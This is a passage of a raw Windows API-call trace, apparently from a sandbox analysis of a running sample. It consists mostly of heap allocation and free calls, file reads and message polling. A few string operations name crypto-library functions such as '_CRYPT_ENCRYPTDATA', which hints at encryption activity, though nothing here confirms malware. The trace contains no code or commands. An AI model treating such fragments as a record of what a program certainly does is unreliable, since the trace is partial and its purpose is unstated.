| out: hHeap=0x1780000) returned 1 [0101.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.702] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0101.703] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0101.703] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0101.703] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0101.707] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0101.707] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0101.708] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x5742, lpOverlapped=0x0) returned 1 [0101.709] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0101.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0101.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x4516010 [0101.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0101.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0101.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x452b760 [0101.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.713] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x4516010 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.714] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0101.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0101.714] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0101.715] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ab0 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x4516010 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b10 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29d0 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0101.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15742) returned 0x499a008 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0101.716] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0101.717] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0101.717] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0101.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.718] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.718] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0101.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.719] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0101.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0101.720] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0101.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.721] RtlAllocateHeap 